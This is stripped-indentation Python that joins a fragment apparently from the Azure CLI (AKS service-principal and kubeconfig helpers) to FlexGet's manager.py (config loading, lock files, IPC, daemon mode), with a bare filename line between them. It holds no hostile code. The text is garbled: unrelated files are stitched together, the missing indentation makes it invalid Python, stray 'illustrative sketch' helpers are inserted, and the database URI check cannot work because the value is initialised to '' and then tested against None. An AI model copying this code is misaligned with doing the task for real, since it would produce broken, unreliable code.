service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
location=None,
name=None):
file_name_aks = 'aksServicePrincipal.json'
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, try to load it from local disk
principal_obj = load_acs_service_principal(subscription_id, file_name=file_name_aks)
if principal_obj:
service_principal = principal_obj.get('service_principal')
client_secret = principal_obj.get('client_secret')
else:
# Nothing to load, make one.
if not client_secret:
client_secret = binascii.b2a_hex(os.urandom(10)).decode('utf-8')
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location)
service_principal = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# We don't need to add role assignment for this created SPN
else:
        # --service-principal specified, validate --client-secret was too
if not client_secret:
raise CLIError('--client-secret is required if --service-principal is specified')
store_acs_service_principal(subscription_id, client_secret, service_principal, file_name=file_name_aks)
return load_acs_service_principal(subscription_id, file_name=file_name_aks)
def _ensure_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
location=None,
name=None):
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, try to load it from local disk
principal_obj = load_acs_service_principal(subscription_id)
if principal_obj:
service_principal = principal_obj.get('service_principal')
client_secret = principal_obj.get('client_secret')
else:
# Nothing to load, make one.
if not client_secret:
client_secret = binascii.b2a_hex(os.urandom(10)).decode('utf-8')
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location)
service_principal = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# add role first before save it
if not _add_role_assignment(cli_ctx, 'Contributor', service_principal):
logger.warning('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
else:
        # --service-principal specified, validate --client-secret was too
if not client_secret:
raise CLIError('--client-secret is required if --service-principal is specified')
store_acs_service_principal(subscription_id, client_secret, service_principal)
return load_acs_service_principal(subscription_id)
def _get_rg_location(ctx, resource_group_name, subscription_id=None):
groups = cf_resource_groups(ctx, subscription_id=subscription_id)
# Just do the get, we don't need the result, it will error out if the group doesn't exist.
rg = groups.get(resource_group_name)
return rg.location
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing):
"""Merge an unencrypted kubeconfig into the file at the specified path, or print it to
stdout if the path is "-".
"""
# Special case for printing to stdout
if path == "-":
print(kubeconfig)
return
# ensure that at least an empty ~/.kube/config exists
directory = os.path.dirname(path)
if directory and not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError as ex:
if ex.errno != errno.EEXIST:
raise
if not os.path.exists(path):
with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
pass
# merge the new kubeconfig into the existing one
fd, temp_path = tempfile.mkstemp()
additional_file = os.fdopen(fd, 'w+t')
try:
additional_file.write(kubeconfig)
additional_file.flush()
merge_kubernetes_configurations(path, temp_path, overwrite_existing)
except yaml.YAMLError as ex:
logger.warning('Failed to merge credentials to kube config file: %s', ex)
finally:
additional_file.close()
os.remove(temp_path)
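# Illustrative sketch (hypothetical helper, placeholder kubeconfig text): passing '-'
# as the path short-circuits _print_or_merge_credentials to stdout, so no file is
# touched and no merge happens.
def _example_print_kubeconfig(kubeconfig_text='apiVersion: v1\nkind: Config\n'):
    _print_or_merge_credentials('-', kubeconfig_text, overwrite_existing=False)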
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
    This works around a quirk of the Python SDK's behavior: these fields are not sent
    by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
def _validate_aci_location(norm_location):
"""
Validate the Azure Container Instance location
"""
aci_locations = [
"centralus",
"eastus",
"eastus2",
"westus",
"westus2",
"northeurope",
"westeurope",
"southeastasia",
"australiaeast"
]
if norm_location not in aci_locations:
raise CLIError('Azure Container Instance is not available at location "{}".'.format(norm_location) +
' The available locations are "{}"'.format(','.join(aci_locations)))
manager.py
import argparse # noqa
import atexit # noqa
import codecs # noqa
import copy # noqa
import errno # noqa
import fnmatch # noqa
import hashlib # noqa
import os # noqa
import shutil # noqa
import signal # noqa
import sys # noqa
import threading # noqa
import traceback # noqa
from contextlib import contextmanager # noqa
from datetime import datetime, timedelta # noqa
from typing import Iterator, List, Optional, Sequence, Tuple, Type, Union, Dict, TYPE_CHECKING # noqa
import sqlalchemy # noqa
import yaml # noqa
from loguru import logger # noqa
from sqlalchemy.engine import Engine
from sqlalchemy.exc import OperationalError # noqa
from sqlalchemy.ext.declarative import declarative_base # noqa
from sqlalchemy.orm import sessionmaker # noqa
# These need to be declared before we start importing from other flexget modules, since they might import them
from flexget.utils.sqlalchemy_utils import ContextSession # noqa
from flexget.utils.tools import get_current_flexget_version, io_encoding, pid_exists # noqa
Base = declarative_base()
Session: Type[ContextSession] = sessionmaker(class_=ContextSession)
import flexget.log # noqa
from flexget import config_schema, db_schema, plugin # noqa
from flexget.event import fire_event # noqa
from flexget.ipc import IPCClient, IPCServer # noqa
from flexget.options import ( # noqa
CoreArgumentParser,
ParserError,
get_parser,
manager_parser,
unicode_argv,
)
from flexget.task import Task # noqa
from flexget.task_queue import TaskQueue # noqa
from flexget.terminal import console, get_console_output # noqa
if TYPE_CHECKING:
from flexget.tray_icon import TrayIcon
from flexget.utils.simple_persistence import SimplePersistence
logger = logger.bind(name='manager')
manager: Optional['Manager'] = None
DB_CLEANUP_INTERVAL = timedelta(days=7)
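# Illustrative sketch (hypothetical helper, placeholder task name): the minimal
# lifecycle a console entry point is assumed to drive with the Manager defined below --
# construct it with CLI-style arguments, then let start() either forward the command to
# a running daemon over IPC or acquire the lock and execute locally.
def _example_run_flexget_once():
    mgr = Manager(['execute', '--tasks', 'my-task'])
    mgr.start()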
class Manager:
"""Manager class for FlexGet
Fires events:
* manager.initialize
The first time the manager is initialized, before config is loaded
* manager.before_config_load
Before the config file is loaded from disk
* manager.before_config_validate
When updating the config, before the validator is run on it
* manager.config_updated
After a configuration file has been loaded or changed (and validated) this event is fired
* manager.startup
After manager has been initialized. This is when application becomes ready to use,
however no database lock is present, so the database must not be modified on this event.
* manager.lock_acquired
The manager does not always require a lock on startup, if one is requested,
this event will run when it has been acquired successfully
* manager.upgrade
If any plugins have declared a newer schema version than exists in the database,
this event will be fired to allow plugins to upgrade their tables
* manager.shutdown_requested
When shutdown has been requested. Any plugins which might add to
execution queue should stop when this is fired.
* manager.shutdown
When the manager is exiting
* manager.execute.completed
If execution in current process was completed
* manager.daemon.started
* manager.daemon.completed
* manager.db_cleanup
"""
unit_test = False
options: argparse.Namespace
def __init__(self, args: Optional[List[str]]) -> None:
"""
:param args: CLI args
"""
global manager
if not self.unit_test:
assert not manager, 'Only one instance of Manager should be created at a time!'
elif manager:
logger.info('last manager was not torn down correctly')
if args is None:
# Decode all arguments to unicode before parsing
args = unicode_argv()[1:]
self.args = args
self.autoreload_config = False
self.config_file_hash: Optional[str] = None
self.config_base: str = ''
self.config_name: str = ''
self.config_path: str = ''
self.log_filename: str = ''
self.db_filename: str = ''
self.engine: Optional[Engine] = None
self.lockfile: str = ''
self.database_uri: str = ''
self.db_upgraded = False
self._has_lock = False
self.is_daemon = False
self.ipc_server: IPCServer
self.task_queue: TaskQueue
self.persist: 'SimplePersistence'
self.initialized = False
self.config: Dict = {}
self.options = self._init_options(self.args)
try:
self._init_config(create=False)
except Exception:
flexget.log.start(level=self.options.loglevel, to_file=False)
raise
manager = self
logger.debug('sys.defaultencoding: {}', sys.getdefaultencoding())
logger.debug('sys.getfilesystemencoding: {}', sys.getfilesystemencoding())
logger.debug('flexget detected io encoding: {}', io_encoding)
logger.debug('os.path.supports_unicode_filenames: {}', os.path.supports_unicode_filenames)
if (
codecs.lookup(sys.getfilesystemencoding()).name == 'ascii'
and not os.path.supports_unicode_filenames
):
logger.warning(
'Your locale declares ascii as the filesystem encoding. Any plugins reading filenames from '
'disk will not work properly for filenames containing non-ascii characters. Make sure your '
'locale env variables are set up correctly for the environment which is launching FlexGet.'
)
def _add_tray_icon_items(self, tray_icon: 'TrayIcon'):
tray_icon.add_menu_item(text='Shutdown', action=self.shutdown, index=2)
tray_icon.add_menu_item(text='Reload Config', action=self.load_config, index=3)
tray_icon.add_menu_separator(index=4)
@staticmethod
def _init_options(args: List[str]) -> argparse.Namespace:
"""Initialize argument parsing"""
try:
options = CoreArgumentParser().parse_known_args(args, do_help=False)[0]
except ParserError as exc:
try:
# If a non-built-in command was used, we need to parse with a parser that
# doesn't define the subparsers
options = manager_parser.parse_known_args(args, do_help=False)[0]
except ParserError:
manager_parser.print_help()
print(f'\nError: {exc.message}')
sys.exit(1)
return options
def _init_logging(self, to_file: bool = True) -> None:
"""Initialize logging facilities"""
log_file = os.path.expanduser(self.options.logfile)
# If an absolute path is not specified, use the config directory.
if not os.path.isabs(log_file):
log_file = os.path.join(self.config_base, log_file)
self.log_filename = log_file
flexget.log.start(
log_file, self.options.loglevel, to_file=to_file, to_console=not self.options.cron
)
def initialize(self) -> None:
"""
Load plugins, database, and config. Also initializes (but does not start) the task queue and ipc server.
This should only be called after obtaining a lock.
"""
if self.initialized:
raise RuntimeError('Cannot call initialize on an already initialized manager.')
plugin.load_plugins(
extra_plugins=[os.path.join(self.config_base, 'plugins')],
extra_components=[os.path.join(self.config_base, 'components')],
)
# Reparse CLI options now that plugins are loaded
self.options = get_parser().parse_args(self.args)
self.task_queue = TaskQueue()
self.ipc_server = IPCServer(self, self.options.ipc_port)
self.setup_yaml()
self.init_sqlalchemy()
fire_event('manager.initialize', self)
try:
self.load_config()
except ValueError as e:
logger.critical('Failed to load config file: {}', e.args[0])
raise
# cannot be imported at module level because of circular references
from flexget.utils.simple_persistence import SimplePersistence
self.persist = SimplePersistence('manager')
if db_schema.upgrade_required():
logger.info('Database upgrade is required. Attempting now.')
fire_event('manager.upgrade', self)
if manager.db_upgraded:
fire_event('manager.db_upgraded', self)
fire_event('manager.startup', self)
self.initialized = True
@property
def tasks(self) -> List[str]:
"""A list of tasks in the config"""
if not self.config:
return []
return list(self.config.get('tasks', {}).keys())
@property
def has_lock(self) -> bool:
return self._has_lock
    def execute(
        self,
        options: Optional[Union[dict, argparse.Namespace]] = None,
        priority: int = 1,
        suppress_warnings: Optional[Sequence[str]] = None,
    ) -> List[Tuple[str, str, threading.Event]]:
"""
Run all (can be limited with options) tasks from the config.
:param options: Either an :class:`argparse.Namespace` instance, or a dict, containing options for execution
:param priority: If there are other executions waiting to be run, they will be run in priority order,
lowest first.
:param suppress_warnings: Allows suppressing log warning about missing plugin in key phases
:returns: a list of :class:`threading.Event` instances which will be
set when each respective task has finished running
"""
if options is None:
options = copy.copy(self.options.execute)
elif isinstance(options, dict):
options_namespace = copy.copy(self.options.execute)
options_namespace.__dict__.update(options)
options = options_namespace
task_names = self.tasks
# Only reload config if daemon
config_hash = self.hash_config()
if self.is_daemon and self.autoreload_config and self.config_file_hash != config_hash:
logger.info('Config change detected. Reloading.')
try:
self.load_config(output_to_console=False, config_file_hash=config_hash)
logger.info('Config successfully reloaded!')
except Exception as e:
logger.error('Reloading config failed: {}', e)
# Handle --tasks
if options.tasks:
# Consider * the same as not specifying tasks at all (makes sure manual plugin still works)
if options.tasks == ['*']:
options.tasks = None
else:
# Create list of tasks to run, preserving order
task_names = []
for arg in options.tasks:
matches = [
t for t in self.tasks if fnmatch.fnmatchcase(str(t).lower(), arg.lower())
]
if not matches:
msg = f'`{arg}` does not match any tasks'
logger.error(msg)
continue
task_names.extend(m for m in matches if m not in task_names)
# Set the option as a list of matching task names so plugins can use it easily
options.tasks = task_names
# TODO: 1.2 This is a hack to make task priorities work still, not sure if it's the best one
task_names = sorted(
task_names, key=lambda t: self.config['tasks'][t].get('priority', 65535)
)
finished_events = []
for task_name in task_names:
task = Task(
self,
task_name,
options=options,
output=get_console_output(),
session_id=flexget.log.get_log_session_id(),
priority=priority,
suppress_warnings=suppress_warnings,
)
self.task_queue.put(task)
finished_events.append((task.id, task.name, task.finished_event))
return finished_events
def start(self) -> None:
"""
Starting point when executing from commandline, dispatch execution to correct destination.
If there is a FlexGet process with an ipc server already running, the command will be sent there for execution
and results will be streamed back.
If not, this will attempt to obtain a lock, initialize the manager, and run the command here.
"""
# When we are in test mode, we use a different lock file and db
if self.options.test:
self.lockfile = os.path.join(self.config_base, '.test-%s-lock' % self.config_name)
# If another process is started, send the execution to the running process
ipc_info = self.check_ipc_info()
# If we are connecting to a running daemon, we don't want to log to the log file,
# the daemon is already handling that.
self._init_logging(to_file=not ipc_info)
if ipc_info:
console(
'There is a FlexGet process already running for this config, sending execution there.'
)
logger.debug('Sending command to running FlexGet process: {}', self.args)
try:
client = IPCClient(ipc_info['port'], ipc_info['password'])
except ValueError as e:
logger.error(e)
else:
try:
client.handle_cli(self.args)
except KeyboardInterrupt:
logger.error(
'Disconnecting from daemon due to ctrl-c. Executions will still continue in the '
'background.'
)
except EOFError:
logger.error('Connection from daemon was severed.')
return
if self.options.test:
logger.info('Test mode, creating a copy from database ...')
db_test_filename = os.path.join(self.config_base, 'test-%s.sqlite' % self.config_name)
if os.path.exists(self.db_filename):
shutil.copy(self.db_filename, db_test_filename)
logger.info('Test database created')
self.db_filename = db_test_filename
# No running process, we start our own to handle command
with self.acquire_lock():
self.initialize()
self.handle_cli()
self._shutdown()
    def handle_cli(self, options: Optional[argparse.Namespace] = None) -> None:
"""
Dispatch a cli command to the appropriate function.
* :meth:`.execute_command`
* :meth:`.daemon_command`
* CLI plugin callback function
The manager should have a lock and be initialized before calling this method.
:param options: argparse options for command. Defaults to options that manager was instantiated with.
"""
if not options:
options = self.options
command = options.cli_command
if command is None:
raise Exception('Command missing')
command_options = getattr(options, command)
# First check for built-in commands
if command in ['execute', 'daemon']:
if command == 'execute':
self.execute_command(command_options)
elif command == 'daemon':
self.daemon_command(command_options)
else:
# Otherwise dispatch the command to the callback function
options.cli_command_callback(self, command_options)
def execute_command(self, options: argparse.Namespace) -> None:
"""
Handles the 'execute' CLI command.
If there is already a task queue running in this process, adds the execution to the queue.
If FlexGet is being invoked with this command, starts up a task queue and runs the execution.
Fires events:
* manager.execute.started
* manager.execute.completed
:param options: argparse options
"""
fire_event('manager.execute.started', self, options)
if self.task_queue.is_alive() or self.is_daemon:
if not self.task_queue.is_alive():
logger.error(
'Task queue has died unexpectedly. Restarting it. Please open an issue on Github and include'
' any previous error logs.'
)
self.task_queue = TaskQueue()
self.task_queue.start()
if len(self.task_queue):
logger.verbose('There is a task already running, execution queued.')
finished_events = self.execute(options)
if not options.cron:
# Wait until execution of all tasks has finished
for _, _, event in finished_events:
event.wait()
else:
self.task_queue.start()
self.ipc_server.start()
self.execute(options)
self.shutdown(finish_queue=True)
self.task_queue.wait()
fire_event('manager.execute.completed', self, options)
def daemon_command(self, options: argparse.Namespace) -> None:
"""
Handles the 'daemon' CLI command.
Fires events:
* manager.daemon.started
* manager.daemon.completed
:param options: argparse options
"""
# Import API so it can register to daemon.started event
if options.action == 'start':
if self.is_daemon:
logger.error('Daemon already running for this config.')
return
elif self.task_queue.is_alive():
logger.error(
'Non-daemon execution of FlexGet is running. Cannot start daemon until it is finished.'
)
return
if options.daemonize:
self.daemonize()
if options.autoreload_config:
self.autoreload_config = True
try:
signal.signal(signal.SIGTERM, self._handle_sigterm)
except ValueError as e:
# If flexget is being called from another script, e.g. windows service helper, and we are not the
# main thread, this error will occur.
logger.debug('Error registering sigterm handler: {}', e)
self.is_daemon = True
def run_daemon(tray_icon: 'TrayIcon' = None):
fire_event('manager.daemon.started', self)
self.task_queue.start()
self.ipc_server.start()
self.task_queue.wait()
fire_event('manager.daemon.completed', self)
if tray_icon:
tray_icon.stop()
if options.tray_icon:
from flexget.tray_icon import tray_icon # noqa
self._add_tray_icon_items(tray_icon)
# Tray icon must be run in the main thread.
m = threading.Thread(target=run_daemon, args=(tray_icon,))
m.start()
tray_icon.run()
m.join()
else:
run_daemon()
elif options.action in ['stop', 'reload-config', 'status']:
if not self.is_daemon:
logger.error('There does not appear to be a daemon running.')
return
if options.action == 'status':
logger.info('Daemon running. (PID: {})', os.getpid())
elif options.action == 'stop':
tasks = (
'all queued tasks (if any) have'
if options.wait
else 'currently running task (if any) has'
)
logger.info(
'Daemon shutdown requested. Shutdown will commence when {} finished executing.',
tasks,
)
self.shutdown(options.wait)
elif options.action == 'reload-config':
logger.info('Reloading config from disk.')
try:
self.load_config()
except ValueError as e:
logger.error('Error loading config: {}', e.args[0])
else:
logger.info('Config successfully reloaded from disk.')
def _handle_sigterm(self, signum, frame) -> None:
logger.info('Got SIGTERM. Shutting down.')
self.shutdown(finish_queue=False)
def setup_yaml(self) -> None:
"""Sets up the yaml loader to return unicode objects for strings by default"""
def construct_yaml_str(self, node):
# Override the default string handling function
# to always return unicode objects
return self.construct_scalar(node)
yaml.Loader.add_constructor('tag:yaml.org,2002:str', construct_yaml_str)
yaml.SafeLoader.add_constructor('tag:yaml.org,2002:str', construct_yaml_str)
# Set up the dumper to not tag every string with !!python/unicode
def unicode_representer(dumper, uni):
node = yaml.ScalarNode(tag='tag:yaml.org,2002:str', value=uni)
return node
yaml.add_representer(str, unicode_representer)
# Set up the dumper to increase the indent for lists
def increase_indent_wrapper(func):
def increase_indent(self, flow=False, indentless=False):
func(self, flow, False)
return increase_indent
yaml.Dumper.increase_indent = increase_indent_wrapper(yaml.Dumper.increase_indent)
yaml.SafeDumper.increase_indent = increase_indent_wrapper(yaml.SafeDumper.increase_indent)
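# Illustrative sketch (not part of FlexGet, the config keys are hypothetical): with the
# patched Dumper above, block sequences are indented under their parent key, e.g.
#
#   yaml.dump({'tasks': {'my-task': {'mock': [{'title': 'x'}]}}}, default_flow_style=False)
#
# renders the list as
#
#   tasks:
#     my-task:
#       mock:
#         - title: x
#
# instead of PyYAML's default flush-left "- title: x" style.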
def _init_config(self, create: bool = False) -> None:
"""
Find and load the configuration file.
:param bool create: If a config file is not found, and create is True, one will be created in the home folder
:raises: `OSError` when no config file could be found, and `create` is False.
"""
home_path = os.path.join(os.path.expanduser('~'), '.flexget')
options_config = os.path.expanduser(self.options.config)
possible = []
if os.path.isabs(options_config):
# explicit path given, don't try anything
config = options_config
possible = [config]
else:
logger.debug('Figuring out config load paths')
try:
possible.append(os.getcwd())
except OSError:
logger.debug('current directory invalid, not searching for config there')
# for virtualenv / dev sandbox
if hasattr(sys, 'real_prefix'):
logger.debug('Adding virtualenv path')
possible.append(sys.prefix)
# normal lookup locations
possible.append(home_path)
if sys.platform.startswith('win'):
# On windows look in ~/flexget as well, as explorer does not let you create a folder starting with a dot
home_path = os.path.join(os.path.expanduser('~'), 'flexget')
possible.append(home_path)
else:
# The freedesktop.org standard config location
xdg_config = os.environ.get(
'XDG_CONFIG_HOME', os.path.join(os.path.expanduser('~'), '.config')
)
possible.append(os.path.join(xdg_config, 'flexget'))
for path in possible:
config = os.path.join(path, options_config)
if os.path.exists(config):
logger.debug('Found config: {}', config)
break
else:
config = None
if create and not (config and os.path.exists(config)):
config = os.path.join(home_path, options_config)
logger.info('Config file {} not found. Creating new config {}', options_config, config)
with open(config, 'w') as newconfig:
# Write empty tasks to the config
newconfig.write(yaml.dump({'tasks': {}}))
elif not config:
logger.critical('Failed to find configuration file {}', options_config)
logger.info('Tried to read from: {}', ', '.join(possible))
raise OSError('No configuration file found.')
if not os.path.isfile(config):
raise OSError('Config `%s` does not appear to be a file.' % config)
logger.debug('Config file {} selected', config)
self.config_path = config
self.config_name = os.path.splitext(os.path.basename(config))[0]
self.config_base = os.path.normpath(os.path.dirname(config))
self.lockfile = os.path.join(self.config_base, '.%s-lock' % self.config_name)
self.db_filename = os.path.join(self.config_base, 'db-%s.sqlite' % self.config_name)
def hash_config(self) -> Optional[str]:
if not self.config_path:
return None
sha1_hash = hashlib.sha1()
with open(self.config_path, 'rb') as f:
while True:
data = f.read(65536)
if not data:
break
sha1_hash.update(data)
return sha1_hash.hexdigest()
def load_config(
self, output_to_console: bool = True, config_file_hash: str = None
) -> None:
"""
Loads the config file from disk, validates and activates it.
:raises: `ValueError` if there is a problem loading the config file
"""
fire_event('manager.before_config_load', self)
with open(self.config_path, 'r', encoding='utf-8') as f:
try:
raw_config = f.read()
except UnicodeDecodeError:
logger.critical('Config file must be UTF-8 encoded.')
raise ValueError('Config file is not UTF-8 encoded')
try:
self.config_file_hash = config_file_hash or self.hash_config()
config = yaml.safe_load(raw_config) or {}
except yaml.YAMLError as e:
msg = str(e).replace('\n', ' ')
msg = ' '.join(msg.split())
logger.critical(msg)
if output_to_console:
print('')
print('-' * 79)
print(' Malformed configuration file (check messages above). Common reasons:')
print('-' * 79)
print('')
print(' o Indentation error')
print(' o Missing : from end of the line')
print(' o Non ASCII characters (use UTF8)')
print(
' o If text contains any of :[]{}% characters it must be single-quoted '
'(eg. value{1} should be \'value{1}\')\n'
)
# Not very good practice, but several kinds of exceptions can end up here and it is
# unclear which ones exactly (at least ReaderError and ScannerError)
if isinstance(e, yaml.MarkedYAMLError):
lines = 0
if e.problem is not None:
print(' Reason: %s\n' % e.problem)
if e.problem == 'mapping values are not allowed here':
print(' ----> MOST LIKELY REASON: Missing : from end of the line!')
print('')
if e.context_mark is not None:
print(
' Check configuration near line %s, column %s'
% (e.context_mark.line, e.context_mark.column)
)
lines += 1
if e.problem_mark is not None:
print(
' Check configuration near line %s, column %s'
% (e.problem_mark.line, e.problem_mark.column)
)
lines += 1
if lines:
print('')
if lines == 1:
print(' Fault is almost always in this or previous line\n')
if lines == 2:
print(' Fault is almost always in one of these lines or previous ones\n')
# When --debug escalate to full stacktrace
if self.options.debug or not output_to_console:
raise
raise ValueError('Config file is not valid YAML')
# config loaded successfully
logger.debug('config_name: {}', self.config_name)
logger.debug('config_base: {}', self.config_base)
# Install the newly loaded config
self.update_config(config)
def update_config(self, config: dict) -> None:
"""
Provide a new config for the manager to use.
:raises: `ValueError` and rolls back to previous config if the provided config is not valid.
"""
new_user_config = config
old_config = self.config
try:
self.config = self.validate_config(config)
except ValueError as e:
for error in getattr(e, 'errors', []):
logger.critical('[{}] {}', error.json_pointer, error.message)
logger.debug('invalid config, rolling back')
self.config = old_config
raise
logger.debug('New config data loaded.')
self.user_config = copy.deepcopy(new_user_config)
fire_event('manager.config_updated', self)
def backup_config(self) -> str:
backup_path = os.path.join(
self.config_base,
'%s-%s.bak' % (self.config_name, datetime.now().strftime('%y%m%d%H%M%S')),
)
logger.debug('backing up old config to {} before new save', backup_path)
try:
shutil.copy(self.config_path, backup_path)
except OSError as e:
logger.warning('Config backup creation failed: {}', str(e))
raise
return backup_path
def save_config(self) -> None:
"""Dumps current config to yaml config file"""
# TODO: Only keep x number of backups..
# Back up the user's current config before overwriting
try:
self.backup_config()
except OSError:
return
with open(self.config_path, 'w') as config_file:
config_file.write(yaml.dump(self.user_config, default_flow_style=False))
def config_changed(self) -> None:
"""Makes sure that all tasks will have the config_modified flag come out true on the next run.
Useful when changing the db and all tasks need to be completely reprocessed."""
from flexget.task import config_changed
config_changed()
fire_event('manager.config_updated', self)
def validate_config(self, config: dict = None) -> dict:
"""
Check all root level keywords are valid. Config may be modified by before_config_validate hooks. Modified
config will be returned.
:param config: Config to check. If not provided, current manager config will be checked.
:raises: `ValueError` when config fails validation. There will be an `errors` attribute with the schema errors.
:returns: Final validated config.
"""
conf = config if config else self.config
conf = fire_event('manager.before_config_validate', conf, self)
errors = config_schema.process_config(conf)
if errors:
err = ValueError('Did not pass schema validation.')
err.errors = errors
raise err
else:
return conf
def init_sqlalchemy(self) -> None:
"""Initialize SQLAlchemy"""
try:
if [int(part) for part in sqlalchemy.__version__.split('.')] < [0, 7, 0]:
print(
'FATAL: SQLAlchemy 0.7.0 or newer required. Please upgrade your SQLAlchemy.',
file=sys.stderr,
)
sys.exit(1)
except ValueError:
logger.critical('Failed to check SQLAlchemy version, you may need to upgrade it')
# SQLAlchemy
if self.database_uri is None:
# in case running on windows, needs double \\
filename = self.db_filename.replace('\\', '\\\\')
self.database_uri = f'sqlite:///{filename}'
if self.db_filename and not os.path.exists(self.db_filename):
logger.verbose('Creating new database {} - DO NOT INTERRUPT ...', self.db_filename)
# fire up the engine
logger.debug('Connecting to: {}', self.database_uri)
try:
self.engine = sqlalchemy.create_engine(
self.database_uri,
echo=self.options.debug_sql,
connect_args={'check_same_thread': False, 'timeout': 10},
)
except ImportError as e:
print(
'FATAL: Unable to use SQLite. Are you running Python 2.7, 3.3 or newer?\n'
'Python should normally have SQLite support built in.\n'
'If you\'re running the correct version of Python then it is not equipped with SQLite.\n'
'You can try installing `pysqlite`. If you have compiled python yourself, '
'recompile it with SQLite support.\n'
'Error: %s' % e,
file=sys.stderr,
)
sys.exit(1)
Session.configure(bind=self.engine)
# create all tables, doesn't do anything to existing tables
try:
Base.metadata.create_all(bind=self.engine)
except OperationalError as e:
if os.path.exists(self.db_filename):
print(
'%s - make sure you have write permissions to file %s'
% (e, self.db_filename),
file=sys.stderr,
)
else:
print(
'%s - make sure you have write permissions to directory %s'
% (e, self.config_base),
file=sys.stderr,
)
raise
def _read_lock(self) -> Optional[dict]:
"""
Read the values from the lock file. Returns None if there is no current lock file.
"""
if self.lockfile and os.path.exists(self.lockfile):
result: Dict[str, Union[str, int]] = {}
with open(self.lockfile, encoding='utf-8') as f:
lines = [line for line in f.readlines() if line]
for line in lines:
try:
key, value = line.split(':', 1)
except ValueError:
logger.debug('Invalid line in lock file: {}', line)
continue
result[key.strip().lower()] = value.strip()
for key in result:
if result[key].isdigit():
result[key] = int(result[key])
result.setdefault('pid', None)
if not result['pid']:
logger.error(
'Invalid lock file. Make sure FlexGet is not running, then delete it.'
)
elif not pid_exists(result['pid']):
return None
return result
return None
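# For reference, a lock file written by write_lock() below is a plain "Key: value"
# text file, e.g. (values are illustrative):
#
#   PID: 12345
#   port: 34567
#
# _read_lock() lower-cases the keys and converts digit-only values to int, so the
# parsed result for the example above would be {'pid': 12345, 'port': 34567}.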
def check_lock(self) -> bool:
"""Returns True if there is a lock on the database."""
lock_info = self._read_lock()
if not lock_info:
return False
# Don't count it if we hold the lock
if os.getpid() == lock_info['pid']:
return False
return True
def check_ipc_info(self) -> Optional[dict]:
"""If a daemon has a lock on the database, return info to connect to IPC."""
lock_info = self._read_lock()
if lock_info and 'port' in lock_info:
return lock_info
return None
@contextmanager
def acquire_lock(self, event: bool = True) -> Iterator:
"""
:param bool event: If True, the 'manager.lock_acquired' event will be fired after a lock is obtained
"""
acquired = False
try:
# Don't do anything if we already have a lock. This means only the outermost call will release the lock file
if not self._has_lock:
# Exit if there is an existing lock.
if self.check_lock():
with open(self.lockfile, encoding='utf-8') as f:
pid = f.read()
print(
'Another process (%s) is running, will exit.' % pid.split('\n')[0],
file=sys.stderr,
)
print(
'If you\'re sure there is no other instance running, delete %s'
% self.lockfile,
file=sys.stderr,
)
sys.exit(1)
self._has_lock = True
self.write_lock()
acquired = True
if event:
fire_event('manager.lock_acquired', self)
yield
finally:
if acquired:
self.release_lock()
self._has_lock = False
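# Minimal usage sketch (illustrative only): only the outermost acquire_lock() call
# creates and later removes the lock file, so nesting is safe. The non-daemon CLI
# path above follows exactly this pattern:
#
#   with manager.acquire_lock():
#       manager.initialize()
#       manager.handle_cli()
#       manager._shutdown()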
def write_lock(self, ipc_info: dict = None) -> None:
assert self._has_lock
with open(self.lockfile, 'w', encoding='utf-8') as f:
f.write('PID: %s\n' % os.getpid())
if ipc_info:
for key in sorted(ipc_info):
f.write('%s: %s\n' % (key, ipc_info[key]))
def release_lock(self) -> None:
try:
os.remove(self.lockfile)
except OSError as e:
if e.errno != errno.ENOENT:
raise
logger.debug('Lockfile {} not found', self.lockfile)
else:
logger.debug('Removed {}', self.lockfile)
def daemonize(self) -> None:
"""Daemonizes the current process. Returns the new pid"""
if sys.platform.startswith('win'):
logger.error('Cannot daemonize on windows')
return
if threading.active_count() != 1:
logger.critical(
'There are {!r} active threads. Daemonizing now may cause strange failures.',
threading.enumerate(),
)
logger.info('Daemonizing...')
try:
pid = os.fork()
if pid > 0:
# Don't run the exit handlers on the parent
atexit._exithandlers = []
# exit first parent
sys.exit(0)
except OSError as e:
sys.stderr.write('fork #1 failed: %d (%s)\n' % (e.errno, e.strerror))
sys.exit(1)
# decouple from parent environment
os.chdir('/')
os.setsid()
os.umask(0)
# do second fork
try:
pid = os.fork()
if pid > 0:
# Don't run the exit handlers on the parent
atexit._exithandlers = []
# exit from second parent
sys.exit(0)
except OSError as e:
sys.stderr.write('fork #2 failed: %d (%s)\n' % (e.errno, e.strerror))
sys.exit(1)
logger.info('Daemonize complete. New PID: {}', os.getpid())
# redirect standard file descriptors
sys.stdout.flush()
sys.stderr.flush()
si = open(os.devnull, 'r')
so = open(os.devnull, 'ab+')
se = open(os.devnull, 'ab+', 0)
